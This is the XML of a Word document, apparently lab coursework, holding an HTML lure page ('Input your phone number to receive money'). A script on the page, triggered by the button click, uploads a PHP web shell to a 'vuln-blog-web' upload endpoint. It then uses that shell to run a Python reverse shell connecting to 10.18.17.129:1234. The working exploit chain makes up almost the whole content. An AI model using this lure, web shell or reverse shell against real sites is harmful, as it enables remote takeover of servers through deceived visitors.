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F0A8" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t>&lt;label&gt;Input your phone number to receive money:&lt;/label&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A854F72" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t>&lt;input type="text" id="phone" class="text-input"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1745B044" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t>&lt;button type="submit" id="btn" name="comment" class="btn"&gt;Click here to receive money&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6787F119" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65394876" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">    const submit = document.getElementById("btn");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619DC4C9" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C933EC3" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">    submit.addEventListener("click", function(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DBC6B0" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">        var data = `------WebKitFormBoundaryLO6qFD0Bcq3kZnXN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05620D8E" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t>Content-Disposition: form-data; name=\"avatar\"; filename=\"shell.php\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAEBC3B" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t>Content-Type: application/octet-stream\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5377ED63" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t>&lt;?php echo system($_GET[\"cmd\"]); \?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADAD385" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t>------WebKitFormBoundaryLO6qFD0Bcq3kZnXN--`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F16603" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">        var cmd = `python3 -c 'import socket,subprocess,os;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E372FC" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABEE49E" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">        s.connect(("10.18.17.129",1234));os.dup2(s.fileno(),0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38556EA6" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">        os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40829A57" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">        import pty; pty.spawn("bash")'`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D67D2BF" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">        fetch("http://localhost/vuln-blog-web/upload.php",{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430CCCBE" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">            method: "POST",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D176977" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">            headers: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6635EF44" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">                "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryLO6qFD0Bcq3kZnXN"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E28F944" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF7F51" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">            body: data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F4298F" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">        }).then(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB1256" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">            fetch("http://localhost/vuln-blog-web/uploads/shell.php?cmd="+cmd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642B60B4" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F29D612" w14:textId="77777777" w:rsidR="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC8CDF" w14:textId="330653F8" w:rsidR="00967DA0" w:rsidRPr="007F4244" w:rsidRDefault="007F4244" w:rsidP="007F4244">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00967DA0" w:rsidRPr="007F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61"/>
    <w:rsid w:val="001F1461"/>
    <w:rsid w:val="007F4244"/>
    <w:rsid w:val="0096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CD08"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{339FAD19-FEB4-479F-AFF8-9ABCC3A0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Danh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lê Công Danh</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-11T17:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-12T10:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>